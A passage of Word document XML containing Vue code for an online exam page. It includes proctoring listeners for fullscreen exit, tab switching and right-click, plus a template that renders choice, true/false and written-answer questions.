        <w:t xml:space="preserve">  console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试开始，设置监听器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1243487D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="3A409F21" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>启动全屏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2585E9" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  document.documentElement.requestFullscreen();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F1C14" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="5B34FC56" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听全屏事件，检查用户是否自己</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Esc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切出屏幕</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC15D9D" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  document.addEventListener('fullscreenchange', handleFullscreenChange);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073118DF" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听鼠标离开页面事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0193C568" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  window.addEventListener('mouseout', handleMouseOut);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D08E892" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监听页面是否活动，检测用户是否最小化或后台</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CEEEF2" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  document.addEventListener('visibilitychange', handleVisibilityChange);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1B151" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  // </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>禁止右键</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC21CE" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  window.addEventListener('contextmenu', (event) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED9AA37" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">    event.preventDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63B34E" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2A16F" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175800F5" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="2629847B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>onBeforeUnmount(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CC357B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  console.log('</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>考试结束，移除监听</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C7E82" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="6FFE1E5C" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  window.removeEventListener('mouseout', handleMouseOut);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DFA729" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  document.removeEventListener('fullscreenchange', handleFullscreenChange);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591C8D8F" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  document.removeEventListener('visibilitychange', handleVisibilityChange);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F9399" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t xml:space="preserve">  window.removeEventListener('contextmenu', handleContextMenu);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7E2D99" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A81854" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="20BA2EE0" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【考试监控模块】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  -- End --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A5117B" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9"/>
    <w:p w14:paraId="483A3D2D" w14:textId="549C67CF" w:rsidR="00BB10C9" w:rsidRPr="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="00BB10C9">
      <w:r>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9F28D9" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24F7106E" w14:textId="2A59BE96" w:rsidR="00BB10C9" w:rsidRDefault="00E31A61" w:rsidP="00BB10C9">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>一页两面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEC7EC4" w14:textId="77777777" w:rsidR="00BB10C9" w:rsidRDefault="00BB10C9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E2F6675" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;template&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7A7CEE" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  &lt;div v-if="!tableData || !tableData.length"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05179BEB" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;el-col :span="12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C53799" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;div class="grid-content bg-purple"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F2CF63" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;div v-for="(quesion, index) in questions" :key="index"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630AC488" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>题目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F227EC2" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;p&gt;{{ index + 1 }}. [{{ quesion.question_type }}] {{ quesion.question_text }}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59659AC9" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29F007B5" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单选题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786479CD" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-radio-group v-if="quesion.question_type == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'" v-model="quesion.stu_answer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A19F84" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-radio v-for="(option, index) in quesion.options" :label="option" :key="option"&gt;{{ option }}&lt;/el-radio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7071501C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/el-radio-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461B351D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD16597" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多选题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28331358" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-checkbox-group v-else-if="quesion.question_type == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>多选</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'" v-model="quesion.stu_answer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A79E75E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;!-- label</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绑定答案的值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以绑定索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>index,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以绑定答案内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>city --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ADD72B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            &lt;el-checkbox v-for="(option, index) in quesion.options" :label="option" :key="option"&gt;{{ option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524542D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            }}&lt;/el-checkbox&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBE2E19" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/el-checkbox-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FB3034" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7674FA6D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B82901" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;el-radio-group v-if="quesion.question_type == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'" v-model="quesion.stu_answer"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409B327" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-radio label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正确</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-radio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732AA3F3" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-radio label="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;/el-radio&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E0A33E" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/el-radio-group&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E34A6D" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAB2DB0" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简答题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4104769B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;div v-if="quesion.question_type == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简答</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346DE97" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-input type="textarea" :rows="3" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" v-model="quesion.stu_answer"&gt;&lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D62F3B" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DEC540" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3441E16C" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;!-- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>论述题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E71B669" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">          &lt;div v-if="quesion.question_type == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>论述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>'"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6FD39A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;el-input type="textarea" :rows="6" placeholder="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请输入内容</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>" v-model="quesion.stu_answer"&gt;&lt;/el-input&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C15A5A5" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">          &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05807799" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C78D517" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3293A926" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CCEFD1" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      &lt;br /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02191D0A" w14:textId="77777777" w:rsidR="00E31A61" w:rsidRDefault="00E31A61" w:rsidP="00E31A61">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    &lt;/el-col&gt;</w:t>
      </w:r>
    </w:p>
